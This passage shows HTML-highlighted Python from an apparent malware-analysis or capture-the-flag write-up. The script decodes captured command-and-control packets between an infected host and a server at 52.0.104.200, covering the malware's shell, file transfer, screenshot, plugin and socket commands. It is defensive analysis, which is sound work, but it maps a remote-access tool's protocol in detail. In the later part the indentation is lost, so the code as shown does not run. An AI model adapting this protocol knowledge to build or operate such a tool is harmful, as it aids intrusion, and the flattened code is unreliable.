            <span class="n">download_plugin_type</span> <span class="o">=</span> <span class="n">download_plugin_header</span><span class="p">[</span><span class="mi">16</span><span class="p">:</span><span class="mi">20</span><span class="p">]</span>
            <span class="k">print</span> <span class="n">colored</span><span class="p">(</span><span class="s">"download plugin id = "</span> <span class="o">+</span> <span class="n">download_plugin_id</span><span class="p">,</span> <span class="s">'magenta'</span><span class="p">)</span>
            <span class="c"># write the reassembled plugin body collected by cmd 6 to disk</span>
            <span class="n">dump</span><span class="p">(</span><span class="s">"./plugin_</span><span class="si">%</span><span class="s">s_</span><span class="si">%</span><span class="s">s.dll"</span> <span class="o">%</span> <span class="p">(</span><span class="n">download_plugin_id</span><span class="p">,</span> <span class="n">download_plugin_type</span><span class="p">),</span> <span class="n">plugin_data</span><span class="p">)</span>
    <span class="k">elif</span> <span class="n">cmd</span> <span class="o">==</span> <span class="mi">8</span><span class="p">:</span>
        <span class="k">print</span> <span class="s">"cmd = 8 -> Processor::Exit"</span>
    <span class="k">elif</span> <span class="p">(</span><span class="n">cmd</span> <span class="o">==</span> <span class="mi">9</span> <span class="ow">or</span> <span class="n">cmd</span> <span class="o">==</span> <span class="mi">10</span><span class="p">):</span>
        <span class="k">print</span> <span class="s">"cmd = 9 or a -> Processor::Unused"</span>
    <span class="k">elif</span> <span class="n">cmd</span> <span class="o">==</span> <span class="mi">11</span><span class="p">:</span>
        <span class="k">print</span> <span class="s">"cmd = b -> Processor::MessageBox"</span>
        <span class="c"># 512-byte UTF-16 title followed by the UTF-16 body</span>
        <span class="n">message</span> <span class="o">=</span> <span class="n">download_plugin_header</span> <span class="o">+</span> <span class="n">download_plugin</span>
        <span class="k">print</span> <span class="s">"====================== MessageBox ====================="</span>
        <span class="k">print</span> <span class="n">colored</span><span class="p">(</span><span class="s">"MessageBox Title: </span><span class="si">%</span><span class="s">s "</span> <span class="o">%</span> <span class="n">message</span><span class="p">[:</span><span class="mi">512</span><span class="p">]</span><span class="o">.</span><span class="n">decode</span><span class="p">(</span><span class="s">'utf16'</span><span class="p">),</span> <span class="s">'magenta'</span><span class="p">)</span>
        <span class="k">print</span> <span class="n">colored</span><span class="p">(</span><span class="s">"MessageBox Content: </span><span class="si">%</span><span class="s">s"</span> <span class="o">%</span> <span class="n">message</span><span class="p">[</span><span class="mi">512</span><span class="p">:]</span><span class="o">.</span><span class="n">decode</span><span class="p">(</span><span class="s">'utf16'</span><span class="p">),</span> <span class="s">'magenta'</span><span class="p">)</span>
    <span class="k">elif</span> <span class="n">cmd</span> <span class="o">==</span> <span class="mi">13</span><span class="p">:</span>
        <span class="k">print</span> <span class="s">"cmd = d -> Processor::ClearDownloadTask"</span>
    <span class="k">elif</span> <span class="n">cmd</span> <span class="o">==</span> <span class="mi">14</span><span class="p">:</span>
        <span class="k">print</span> <span class="s">"cmd = e -> Processor::Online"</span>
        <span class="k">if</span> <span class="n">mode</span> <span class="o">==</span> <span class="s">"SERVER"</span><span class="p">:</span>
            <span class="k">print</span> <span class="s">"password = "</span> <span class="o">+</span> <span class="n">download_plugin_header</span><span class="o">.</span><span class="n">decode</span><span class="p">(</span><span class="s">'utf16'</span><span class="p">)</span><span class="o">.</span><span class="n">rstrip</span><span class="p">(</span><span class="s">"</span><span class="se">\x00</span><span class="s">"</span><span class="p">)</span>
    <span class="k">else</span><span class="p">:</span>
        <span class="c"># cmd is an int, so convert before concatenating</span>
        <span class="k">print</span> <span class="n">colored</span><span class="p">(</span><span class="s">"error cmd id: "</span> <span class="o">+</span> <span class="nb">str</span><span class="p">(</span><span class="n">cmd</span><span class="p">),</span> <span class="s">"red"</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">processor_file</span><span class="p">(</span><span class="n">cmd</span><span class="p">,</span> <span class="n">download_data</span><span class="p">,</span> <span class="n">mode</span><span class="p">):</span>
    <span class="k">global</span> <span class="n">file_data</span>
    <span class="k">global</span> <span class="n">file_name</span>
    <span class="k">if</span> <span class="n">cmd</span> <span class="o">==</span> <span class="mi">1</span><span class="p">:</span>
        <span class="k">print</span> <span class="s">"file -> get drive info"</span>
        <span class="k">if</span> <span class="n">mode</span> <span class="o">==</span> <span class="s">"CLIENT"</span><span class="p">:</span>
            <span class="k">print</span> <span class="s">"==============================================="</span>
            <span class="c"># response is an array of fixed 0x228-byte drive records</span>
            <span class="n">drive_size</span> <span class="o">=</span> <span class="mi">552</span> <span class="c">#0x228</span>
            <span class="n">num</span> <span class="o">=</span> <span class="nb">len</span><span class="p">(</span><span class="n">download_data</span><span class="p">)</span> <span class="o">/</span> <span class="n">drive_size</span>
            <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">num</span><span class="p">):</span>
                <span class="k">print</span> <span class="s">"drive "</span> <span class="o">+</span> <span class="nb">str</span><span class="p">(</span><span class="n">i</span><span class="p">)</span>
                <span class="n">drive</span> <span class="o">=</span> <span class="n">download_data</span><span class="p">[</span><span class="mh">0x228</span><span class="o">*</span><span class="n">i</span><span class="p">:</span><span class="mh">0x228</span><span class="o">*</span><span class="p">(</span><span class="n">i</span><span class="o">+</span><span class="mi">1</span><span class="p">)]</span>
                <span class="n">drive_name</span> <span class="o">=</span> <span class="n">drive</span><span class="p">[:</span><span class="mi">4</span><span class="p">]</span><span class="o">.</span><span class="n">decode</span><span class="p">(</span><span class="s">'utf16'</span><span class="p">)</span><span class="o">.</span><span class="n">rstrip</span><span class="p">(</span><span class="s">"</span><span class="se">\x00</span><span class="s">"</span><span class="p">)</span>
                <span class="n">drive_type</span> <span class="o">=</span> <span class="n">drive</span><span class="p">[</span><span class="mh">0x128</span><span class="p">:]</span><span class="o">.</span><span class="n">decode</span><span class="p">(</span><span class="s">'utf16'</span><span class="p">)</span><span class="o">.</span><span class="n">rstrip</span><span class="p">(</span><span class="s">"</span><span class="se">\x00</span><span class="s">"</span><span class="p">)</span>
                <span class="k">print</span> <span class="n">colored</span><span class="p">(</span><span class="s">"drive name = "</span> <span class="o">+</span> <span class="n">drive_name</span><span class="p">,</span> <span class="s">"green"</span><span class="p">)</span>
                <span class="k">print</span> <span class="n">colored</span><span class="p">(</span><span class="n">drive_type</span><span class="p">,</span> <span class="s">"green"</span><span class="p">)</span>
                <span class="n">drive</span> <span class="o">=</span> <span class="s">""</span>
    <span class="k">elif</span> <span class="n">cmd</span> <span class="o">==</span> <span class="mi">2</span><span class="p">:</span>
        <span class="k">print</span> <span class="s">"cmd = 2"</span>
        <span class="k">print</span> <span class="n">colored</span><span class="p">(</span><span class="s">"file -> List Directory </span><span class="si">%</span><span class="s">s"</span> <span class="o">%</span> <span class="n">download_data</span><span class="p">[:</span><span class="mi">260</span><span class="p">]</span><span class="o">.</span><span class="n">decode</span><span class="p">(</span><span class="s">'utf16'</span><span class="p">)</span><span class="o">.</span><span class="n">rstrip</span><span class="p">(</span><span class="s">"</span><span class="se">\x00</span><span class="s">"</span><span class="p">),</span> <span class="s">'green'</span><span class="p">)</span>
    <span class="k">elif</span> <span class="n">cmd</span> <span class="o">==</span> <span class="mi">3</span><span class="p">:</span>
        <span class="k">print</span> <span class="s">"cmd = 3"</span>
        <span class="k">if</span> <span class="n">mode</span> <span class="o">==</span> <span class="s">"CLIENT"</span><span class="p">:</span>
            <span class="k">print</span> <span class="s">"file -> Download"</span>
        <span class="k">elif</span> <span class="n">mode</span> <span class="o">==</span> <span class="s">"SERVER"</span><span class="p">:</span>
            <span class="n">file_name</span> <span class="o">=</span> <span class="n">download_data</span><span class="p">[</span><span class="mi">16</span><span class="p">:]</span><span class="o">.</span><span class="n">decode</span><span class="p">(</span><span class="s">'utf16'</span><span class="p">)</span><span class="o">.</span><span class="n">rstrip</span><span class="p">(</span><span class="s">"</span><span class="se">\x00</span><span class="s">"</span><span class="p">)</span>
            <span class="k">print</span> <span class="s">"file -> Download | </span><span class="si">%</span><span class="s">s"</span> <span class="o">%</span> <span class="n">file_name</span>
            <span class="n">file_data</span> <span class="o">=</span> <span class="s">""</span>
    <span class="k">elif</span> <span class="n">cmd</span> <span class="o">==</span> <span class="mi">4</span><span class="p">:</span>
        <span class="k">if</span> <span class="n">mode</span> <span class="o">==</span> <span class="s">"CLIENT"</span><span class="p">:</span>
            <span class="c"># 40-byte chunk header: 16-byte id, then u64 sent / total size / block length</span>
            <span class="n">file_id</span> <span class="o">=</span> <span class="n">download_data</span><span class="p">[:</span><span class="mi">16</span><span class="p">]</span><span class="o">.</span><span class="n">encode</span><span class="p">(</span><span class="s">'hex'</span><span class="p">)</span>
            <span class="n">sent</span> <span class="o">=</span> <span class="n">u64</span><span class="p">(</span><span class="n">download_data</span><span class="p">[</span><span class="mi">16</span><span class="p">:</span><span class="mi">24</span><span class="p">])</span>
            <span class="n">size</span> <span class="o">=</span> <span class="n">u64</span><span class="p">(</span><span class="n">download_data</span><span class="p">[</span><span class="mi">24</span><span class="p">:</span><span class="mi">32</span><span class="p">])</span>
            <span class="n">block</span> <span class="o">=</span> <span class="n">u64</span><span class="p">(</span><span class="n">download_data</span><span class="p">[</span><span class="mi">32</span><span class="p">:</span><span class="mi">40</span><span class="p">])</span>
            <span class="k">if</span> <span class="n">sent</span> <span class="o">==</span> <span class="n">size</span><span class="p">:</span>
                <span class="c"># the final message carries the file's SHA1 in its first 20 bytes</span>
                <span class="n">sha1</span> <span class="o">=</span> <span class="n">download_data</span><span class="p">[:</span><span class="mi">20</span><span class="p">]</span><span class="o">.</span><span class="n">encode</span><span class="p">(</span><span class="s">'hex'</span><span class="p">)</span>
                <span class="k">print</span> <span class="p">(</span><span class="s">"file -> Download | ID: </span><span class="si">%</span><span class="s">s | Finished | SHA1: </span><span class="si">%</span><span class="s">s"</span> <span class="o">%</span> <span class="p">(</span><span class="n">file_id</span><span class="p">,</span> <span class="n">sha1</span><span class="p">))</span>
                <span class="k">print</span> <span class="n">colored</span><span class="p">(</span><span class="s">"dump lab10.zip.cry"</span><span class="p">,</span> <span class="s">'red'</span><span class="p">)</span>
                <span class="n">dump</span><span class="p">(</span><span class="s">"</span><span class="si">%</span><span class="s">s"</span> <span class="o">%</span> <span class="n">sha1</span><span class="p">,</span> <span class="n">file_data</span><span class="p">)</span>
            <span class="k">else</span><span class="p">:</span>
                <span class="k">print</span> <span class="p">(</span><span class="s">"file -> Download | ID: </span><span class="si">%</span><span class="s">s | File Response </span><span class="si">%</span><span class="s">d bytes (</span><span class="si">%</span><span class="s">d/</span><span class="si">%</span><span class="s">d) "</span> <span class="o">%</span> <span class="p">(</span><span class="n">file_id</span><span class="p">,</span> <span class="n">block</span><span class="p">,</span> <span class="n">sent</span><span class="p">,</span> <span class="n">size</span><span class="p">))</span>
                <span class="n">file_data</span> <span class="o">+=</span> <span class="n">download_data</span><span class="p">[</span><span class="mi">40</span><span class="p">:</span><span class="mi">40</span><span class="o">+</span><span class="n">block</span><span class="p">]</span>
    <span class="k">elif</span> <span class="n">cmd</span> <span class="o">==</span> <span class="mi">5</span><span class="p">:</span>
        <span class="k">print</span> <span class="s">"file -> Close file"</span>
    <span class="k">elif</span> <span class="n">cmd</span> <span class="o">==</span> <span class="mi">6</span><span class="p">:</span>
        <span class="k">print</span> <span class="s">"cmd = 6"</span>
        <span class="k">if</span> <span class="n">mode</span> <span class="o">==</span> <span class="s">"CLIENT"</span><span class="p">:</span>
            <span class="k">print</span> <span class="s">"file -> Upload"</span>
        <span class="k">elif</span> <span class="n">mode</span> <span class="o">==</span> <span class="s">"SERVER"</span><span class="p">:</span>
            <span class="c"># upload request: 16-byte id, u32 size at 24, SHA1 at 32..52, UTF-16 path from 52</span>
            <span class="n">filename</span> <span class="o">=</span> <span class="n">download_data</span><span class="p">[</span><span class="mi">52</span><span class="p">:]</span><span class="o">.</span><span class="n">decode</span><span class="p">(</span><span class="s">'utf16'</span><span class="p">)</span><span class="o">.</span><span class="n">rstrip</span><span class="p">(</span><span class="s">"</span><span class="se">\x00</span><span class="s">"</span><span class="p">)</span>
            <span class="n">fid</span> <span class="o">=</span> <span class="n">download_data</span><span class="p">[:</span><span class="mi">16</span><span class="p">]</span><span class="o">.</span><span class="n">encode</span><span class="p">(</span><span class="s">'hex'</span><span class="p">)</span>
            <span class="k">print</span> <span class="s">"upload "</span> <span class="o">+</span> <span class="n">filename</span>
            <span class="n">size</span> <span class="o">=</span> <span class="n">u32</span><span class="p">(</span><span class="n">download_data</span><span class="p">[</span><span class="mi">24</span><span class="p">:</span><span class="mi">28</span><span class="p">])</span>
            <span class="n">sha1</span> <span class="o">=</span> <span class="n">download_data</span><span class="p">[</span><span class="mi">32</span><span class="p">:</span><span class="mi">52</span><span class="p">]</span><span class="o">.</span><span class="n">encode</span><span class="p">(</span><span class="s">'hex'</span><span class="p">)</span>
            <span class="k">print</span> <span class="p">(</span><span class="s">"file -> Upload: </span><span class="si">%</span><span class="s">s | </span><span class="si">%</span><span class="s">s | Size: </span><span class="si">%</span><span class="s">d | SHA1: </span><span class="si">%</span><span class="s">s"</span> <span class="o">%</span> <span class="p">(</span><span class="n">filename</span><span class="p">,</span> <span class="n">fid</span><span class="p">,</span> <span class="n">size</span><span class="p">,</span> <span class="n">sha1</span><span class="p">)</span> <span class="p">)</span>
            <span class="c"># file_data = ""</span>
            <span class="n">file_name</span> <span class="o">=</span> <span class="n">filename</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s">"</span><span class="se">\\</span><span class="s">"</span><span class="p">)[</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span>
    <span class="k">elif</span> <span class="n">cmd</span> <span class="o">==</span> <span class="mi">7</span><span class="p">:</span>
        <span class="k">print</span> <span class="s">"cmd = 7"</span>
        <span class="k">if</span> <span class="n">mode</span> <span class="o">==</span> <span class="s">"SERVER"</span><span class="p">:</span>
            <span class="c"># upload chunk: u32 written at 16, total size at 24, block length at 32, data from 40</span>
            <span class="n">sha1</span> <span class="o">=</span> <span class="n">download_data</span><span class="p">[:</span><span class="mi">16</span><span class="p">]</span><span class="o">.</span><span class="n">encode</span><span class="p">(</span><span class="s">'hex'</span><span class="p">)</span>
            <span class="n">written</span> <span class="o">=</span> <span class="n">u32</span><span class="p">(</span><span class="n">download_data</span><span class="p">[</span><span class="mi">16</span><span class="p">:</span><span class="mi">20</span><span class="p">])</span>
            <span class="n">size</span> <span class="o">=</span> <span class="n">u32</span><span class="p">(</span><span class="n">download_data</span><span class="p">[</span><span class="mi">24</span><span class="p">:</span><span class="mi">28</span><span class="p">])</span>
            <span class="n">block</span> <span class="o">=</span> <span class="n">u32</span><span class="p">(</span><span class="n">download_data</span><span class="p">[</span><span class="mi">32</span><span class="p">:</span><span class="mi">36</span><span class="p">])</span>
            <span class="k">if</span> <span class="n">block</span> <span class="o">==</span> <span class="mi">0</span><span class="p">:</span>
                <span class="c"># a zero-length block marks the end of the upload</span>
                <span class="k">print</span> <span class="s">"file -> Upload: </span><span class="si">%</span><span class="s">s | Finished (</span><span class="si">%</span><span class="s">d/</span><span class="si">%</span><span class="s">d)"</span> <span class="o">%</span> <span class="p">(</span><span class="n">sha1</span><span class="p">,</span> <span class="n">written</span><span class="p">,</span> <span class="n">size</span><span class="p">)</span>
                <span class="k">print</span> <span class="n">colored</span><span class="p">((</span><span class="s">"Dump file </span><span class="si">%</span><span class="s">s..."</span> <span class="o">%</span> <span class="n">file_name</span><span class="p">),</span> <span class="s">'green'</span><span class="p">)</span>
                <span class="n">dump</span><span class="p">(</span><span class="n">file_name</span><span class="p">,</span> <span class="n">file_data</span><span class="p">)</span>
            <span class="k">else</span><span class="p">:</span>
                <span class="k">print</span> <span class="p">(</span><span class="s">"file -> Upload: </span><span class="si">%</span><span class="s">s | </span><span class="si">%</span><span class="s">d bytes (</span><span class="si">%</span><span class="s">d/</span><span class="si">%</span><span class="s">d)"</span> <span class="o">%</span> <span class="p">(</span><span class="n">sha1</span><span class="p">,</span> <span class="n">block</span><span class="p">,</span> <span class="n">written</span><span class="p">,</span> <span class="n">size</span><span class="p">))</span>
                <span class="n">file_data</span> <span class="o">+=</span> <span class="n">download_data</span><span class="p">[</span><span class="mi">40</span><span class="p">:</span><span class="mi">40</span><span class="o">+</span><span class="n">block</span><span class="p">]</span>
    <span class="k">elif</span> <span class="p">(</span><span class="n">cmd</span> <span class="o">==</span> <span class="mi">8</span> <span class="ow">or</span> <span class="n">cmd</span> <span class="o">==</span> <span class="mi">9</span> <span class="ow">or</span> <span class="n">cmd</span> <span class="o">==</span> <span class="mi">10</span><span class="p">):</span>
        <span class="k">print</span> <span class="s">"cmd = 8, 9, a -> file ping"</span>
    <span class="k">else</span><span class="p">:</span>
        <span class="k">print</span> <span class="n">colored</span><span class="p">(</span><span class="s">"file cmd error, cmd = </span><span class="si">%</span><span class="s">s"</span> <span class="o">%</span> <span class="n">cmd</span><span class="p">,</span> <span class="s">'red'</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">processor_shell</span><span class="p">(</span><span class="n">cmd</span><span class="p">,</span> <span class="n">download_data</span><span class="p">,</span> <span class="n">mode</span><span class="p">):</span>
    <span class="k">if</span> <span class="n">cmd</span> <span class="o">==</span> <span class="mi">1</span><span class="p">:</span>
        <span class="k">print</span> <span class="s">"shell cmd -> Start"</span>
    <span class="k">elif</span> <span class="n">cmd</span> <span class="o">==</span> <span class="mi">2</span><span class="p">:</span>
        <span class="k">print</span> <span class="s">"shell cmd -> Close"</span>
    <span class="k">elif</span> <span class="n">cmd</span> <span class="o">==</span> <span class="mi">3</span><span class="p">:</span>
        <span class="c"># NUL-terminated command line; CRLF shown escaped so it stays on one line</span>
        <span class="n">shell_cmd</span> <span class="o">=</span> <span class="n">download_data</span>
        <span class="k">print</span> <span class="s">"shell cmd"</span>
        <span class="k">print</span> <span class="n">colored</span><span class="p">(</span><span class="n">shell_cmd</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="s">"</span><span class="se">\r\n</span><span class="s">"</span><span class="p">,</span> <span class="s">"</span><span class="se">\\</span><span class="s">r</span><span class="se">\\</span><span class="s">n"</span><span class="p">)</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s">"</span><span class="se">\x00</span><span class="s">"</span><span class="p">)[</span><span class="mi">0</span><span class="p">],</span> <span class="s">'green'</span><span class="p">)</span>
    <span class="k">elif</span> <span class="n">cmd</span> <span class="o">==</span> <span class="mi">4</span><span class="p">:</span>
        <span class="n">shell_data</span> <span class="o">=</span> <span class="n">download_data</span>
        <span class="k">print</span> <span class="s">"==================== shell response ===================="</span>
        <span class="k">print</span> <span class="n">colored</span><span class="p">(</span><span class="n">shell_data</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s">'</span><span class="se">\x00</span><span class="s">'</span><span class="p">)[</span><span class="mi">0</span><span class="p">],</span> <span class="s">"green"</span><span class="p">)</span>
    <span class="k">else</span><span class="p">:</span>
        <span class="k">print</span> <span class="n">colored</span><span class="p">(</span><span class="s">"shell cmd error"</span><span class="p">,</span> <span class="s">"red"</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">processor_screen</span><span class="p">(</span><span class="n">cmd</span><span class="p">,</span> <span class="n">download_data</span><span class="p">,</span> <span class="n">mode</span><span class="p">):</span>
    <span class="k">global</span> <span class="n">bmp_header</span>
    <span class="k">global</span> <span class="n">bmp_body</span>
    <span class="n">screen_data</span> <span class="o">=</span> <span class="n">download_data</span>
    <span class="k">if</span> <span class="n">cmd</span> <span class="o">==</span> <span class="mi">1</span><span class="p">:</span>
        <span class="k">print</span> <span class="s">"screen -> take Screenshot"</span>
        <span class="n">color_depths</span> <span class="o">=</span> <span class="n">u32</span><span class="p">(</span><span class="n">screen_data</span><span class="p">[:</span><span class="mi">4</span><span class="p">])</span> <span class="c">#color depths (1, 4, 8, 16, 24, 32, or 64 bits per pixel)</span>
        <span class="k">print</span> <span class="s">"screen -> color depths: </span><span class="si">%</span><span class="s">d bits per pixel"</span> <span class="o">%</span> <span class="p">(</span><span class="n">color_depths</span><span class="p">)</span>
    <span class="k">elif</span> <span class="p">(</span><span class="n">cmd</span> <span class="o">==</span> <span class="mi">2</span> <span class="ow">and</span> <span class="n">mode</span> <span class="o">==</span> <span class="s">"CLIENT"</span><span class="p">):</span>
        <span class="k">print</span> <span class="s">"screen cmd = 2"</span>
        <span class="c"># u32 total size, then a BITMAPINFOHEADER: width at 4, height at 8, bpp at 14</span>
        <span class="n">size</span> <span class="o">=</span> <span class="n">u32</span><span class="p">(</span><span class="n">screen_data</span><span class="p">[:</span><span class="mi">4</span><span class="p">])</span>
        <span class="n">bmp_header</span> <span class="o">=</span> <span class="n">screen_data</span><span class="p">[</span><span class="mi">4</span><span class="p">:]</span>
        <span class="n">width</span> <span class="o">=</span> <span class="n">u32</span><span class="p">(</span><span class="n">bmp_header</span><span class="p">[</span><span class="mi">4</span><span class="p">:</span><span class="mi">8</span><span class="p">])</span>
        <span class="n">height</span> <span class="o">=</span> <span class="n">u32</span><span class="p">(</span><span class="n">bmp_header</span><span class="p">[</span><span class="mi">8</span><span class="p">:</span><span class="mi">12</span><span class="p">])</span>
        <span class="n">color_depths</span> <span class="o">=</span> <span class="n">u16</span><span class="p">(</span><span class="n">bmp_header</span><span class="p">[</span><span class="mi">14</span><span class="p">:</span><span class="mi">16</span><span class="p">])</span>
        <span class="k">print</span> <span class="s">"screen -> Response Header | size: </span><span class="si">%</span><span class="s">d | (</span><span class="si">%</span><span class="s">d x </span><span class="si">%</span><span class="s">d) </span><span class="si">%</span><span class="s">d bit"</span> <span class="o">%</span> <span class="p">(</span><span class="n">size</span><span class="p">,</span> <span class="n">width</span><span class="p">,</span> <span class="n">height</span><span class="p">,</span> <span class="n">color_depths</span><span class="p">)</span>
    <span class="k">elif</span> <span class="n">cmd</span> <span class="o">==</span> <span class="mi">3</span><span class="p">:</span>
        <span class="k">print</span> <span class="s">"screen -> collect bitmap data"</span>
        <span class="c"># 12-byte chunk header: u32 sent / total size / block length</span>
        <span class="n">sent</span> <span class="o">=</span> <span class="n">u32</span><span class="p">(</span><span class="n">screen_data</span><span class="p">[</span><span class="mi">0</span><span class="p">:</span><span class="mi">4</span><span class="p">])</span>
        <span class="n">size</span> <span class="o">=</span> <span class="n">u32</span><span class="p">(</span><span class="n">screen_data</span><span class="p">[</span><span class="mi">4</span><span class="p">:</span><span class="mi">8</span><span class="p">])</span>
        <span class="n">block</span> <span class="o">=</span> <span class="n">u32</span><span class="p">(</span><span class="n">screen_data</span><span class="p">[</span><span class="mi">8</span><span class="p">:</span><span class="mi">12</span><span class="p">])</span>
        <span class="k">print</span> <span class="s">"screen -> Response | </span><span class="si">%</span><span class="s">d (</span><span class="si">%</span><span class="s">d/</span><span class="si">%</span><span class="s">d)"</span> <span class="o">%</span> <span class="p">(</span><span class="n">block</span><span class="p">,</span> <span class="n">sent</span><span class="p">,</span> <span class="n">size</span><span class="p">)</span>
<span class="n">bmp_body</span> <span class="o">=</span> <span class="n">bmp_body</span><span class="o">.</span><span class="n">ljust</span><span class="p">(</span><span class="n">sent</span><span class="p">,</span> <span class="s">"</span><span class="se">\0</span><span class="s">"</span><span class="p">)</span>
<span class="n">bmp_body</span> <span class="o">+=</span> <span class="n">screen_data</span><span class="p">[</span><span class="mi">12</span><span class="p">:</span><span class="n">block</span><span class="o">+</span><span class="mi">12</span><span class="p">]</span>
<span class="k">if</span> <span class="n">sent</span> <span class="o">+</span> <span class="n">block</span> <span class="o">==</span> <span class="n">size</span><span class="p">:</span>
<span class="n">save_bmp</span><span class="p">(</span><span class="n">bmp_header</span><span class="p">,</span> <span class="n">bmp_body</span><span class="p">)</span>
<span class="k">else</span><span class="p">:</span>
<span class="k">print</span> <span class="n">colored</span><span class="p">(</span><span class="s">"screen cmd error"</span><span class="p">,</span> <span class="s">"red"</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">processor_socket</span><span class="p">(</span><span class="n">cmd</span><span class="p">,</span> <span class="n">download_data</span><span class="p">,</span> <span class="n">mode</span><span class="p">):</span>
<span class="k">global</span> <span class="n">send_data</span>
<span class="k">global</span> <span class="n">recv_data</span>
<span class="k">if</span> <span class="n">cmd</span> <span class="o">==</span> <span class="mi">1</span><span class="p">:</span>
<span class="k">print</span> <span class="s">"socket -> start socket"</span>
<span class="k">if</span> <span class="n">mode</span> <span class="o">==</span> <span class="s">"SERVER"</span><span class="p">:</span>
<span class="n">port</span> <span class="o">=</span> <span class="n">u32</span><span class="p">(</span><span class="n">download_data</span><span class="p">[</span><span class="mi">0</span><span class="p">:</span><span class="mi">4</span><span class="p">])</span>
<span class="n">host</span> <span class="o">=</span> <span class="n">download_data</span><span class="p">[</span><span class="mi">4</span><span class="p">:]</span><span class="o">.</span><span class="n">rstrip</span><span class="p">(</span><span class="s">"</span><span class="se">\x00</span><span class="s">"</span><span class="p">)</span>
<span class="k">print</span> <span class="n">colored</span><span class="p">(</span><span class="s">"host: </span><span class="si">%</span><span class="s">s, port: </span><span class="si">%</span><span class="s">d"</span> <span class="o">%</span> <span class="p">(</span><span class="n">host</span><span class="p">,</span> <span class="n">port</span><span class="p">),</span> <span class="s">'magenta'</span><span class="p">)</span>
<span class="k">print</span> <span class="n">send_data</span>
<span class="k">print</span>
<span class="k">elif</span> <span class="n">cmd</span> <span class="o">==</span> <span class="mi">2</span><span class="p">:</span>
<span class="k">print</span> <span class="s">"socket -> colse socket"</span>
<span class="k">if</span> <span class="n">send_data</span><span class="p">:</span>
<span class="k">print</span> <span class="n">colored</span><span class="p">(</span><span class="s">"dump send data to server.bin"</span><span class="p">,</span> <span class="s">'magenta'</span><span class="p">)</span>
<span class="n">dump</span><span class="p">(</span><span class="s">"server2.bin"</span><span class="p">,</span> <span class="n">send_data</span><span class="p">)</span>
<span class="k">elif</span> <span class="n">cmd</span> <span class="o">==</span> <span class="mi">3</span><span class="p">:</span>
<span class="k">if</span> <span class="n">mode</span> <span class="o">==</span> <span class="s">"SERVER"</span><span class="p">:</span>
<span class="k">print</span> <span class="p">(</span><span class="s">"socket -> connect | Send: </span><span class="si">%</span><span class="s">d bytes"</span> <span class="o">%</span> <span class="nb">len</span><span class="p">(</span><span class="n">download_data</span><span class="p">))</span>
<span class="n">send_data</span> <span class="o">+=</span> <span class="n">download_data</span>
<span class="k">elif</span> <span class="n">mode</span> <span class="o">==</span> <span class="s">"CLIENT"</span><span class="p">:</span>
<span class="k">print</span> <span class="p">(</span><span class="s">"socket -> connect | Recv: </span><span class="si">%</span><span class="s">d bytes"</span> <span class="o">%</span> <span class="nb">len</span><span class="p">(</span><span class="n">download_data</span><span class="p">))</span>
<span class="n">recv_data</span> <span class="o">+=</span> <span class="n">download_data</span>
<span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">download_data</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span> <span class="ow">and</span> <span class="n">recv_data</span><span class="p">:</span>
<span class="k">print</span> <span class="n">colored</span><span class="p">(</span><span class="s">"Dump recv data to client.bin..."</span><span class="p">,</span> <span class="s">'magenta'</span><span class="p">)</span>
<span class="n">dump</span><span class="p">(</span><span class="s">"client2.bin"</span><span class="p">,</span> <span class="n">recv_data</span><span class="p">)</span>
<span class="k">elif</span> <span class="n">cmd</span> <span class="o">==</span> <span class="mi">4</span><span class="p">:</span>
<span class="k">print</span> <span class="s">"scoket -> recv"</span>
<span class="k">else</span><span class="p">:</span>
<span class="k">print</span> <span class="n">colored</span><span class="p">(</span><span class="s">"cmd error"</span><span class="p">,</span> <span class="s">'red'</span><span class="p">)</span>
<span class="c">########################################### packet functions ########################################## </span>
<span class="k">def</span> <span class="nf">get_mode_by_ip</span><span class="p">(</span><span class="n">ip</span><span class="p">):</span>
<span class="k">print</span> <span class="s">"---------------------------------------------------------------------"</span>
<span class="k">if</span> <span class="n">ip</span> <span class="o">==</span> <span class="s">"192.168.221.91"</span><span class="p">:</span>
<span class="k">print</span> <span class="n">colored</span><span class="p">(</span><span class="s">"[Client] "</span><span class="p">,</span> <span class="s">"yellow"</span><span class="p">)</span> <span class="o">+</span> <span class="n">ip</span>
<span class="n">mode</span> <span class="o">=</span> <span class="s">"CLIENT"</span>
<span class="k">return</span> <span class="n">mode</span>
<span class="k">elif</span> <span class="n">ip</span> <span class="o">==</span> <span class="s">'52.0.104.200'</span><span class="p">:</span>
<span class="k">print</span> <span class="n">colored</span><span class="p">(</span><span class="s">"[Server] "</span><span class="p">,</span> <span class="s">"cyan"</span><span class="p">)</span> <span class="o">+</span> <span class="n">ip</span>
<span class="n">mode</span> <span class="o">=</span> <span class="s">"SERVER"</span>
<span class="k">return</span> <span class="n">mode</span>
<span class="k">else</span><span class="p">:</span>
<span class="k">print</span> <span class="n">colored</span><span class="p">(</span><span class="s">"get ip error"</span><span class="p">,</span> <span class="s">"red"</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">decode_stage2_packet</span><span class="p">():</span>
<span class="n">collect_data</span> <span class="o">=</span> <span class="s">''</span>
<span class="n">compile_data</span> <span class="o">=</span> <span class="s">''</span>
<span class="n">packet</span> <span class="o">=</span> <span class="n">read_stage2_packet</span><span class="p">()</span>
<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="n">packet</span><span class="p">:</span>
<span class="n">ip_src</span> <span class="o">=</span> <span class="n">i</span><span class="p">[</span><span class="s">'_source'</span><span class="p">][</span><span class="s">'layers'</span><span class="p">][</span><span class="s">'ip'</span><span class="p">][</span><span class="s">'ip.src'</span><span class="p">]</span> <span class="c">#dict </span>
<span class="k">try</span><span class="p">:</span>
<span class="n">data</span> <span class="o">=</span> <span class="n">i</span><span class="p">[</span><span class="s">'_source'</span><span class="p">][</span><span class="s">'layers'</span><span class="p">][</span><span class="s">'data'</span><span class="p">][</span><span class="s">'data.data'</span><span class="p">]</span>
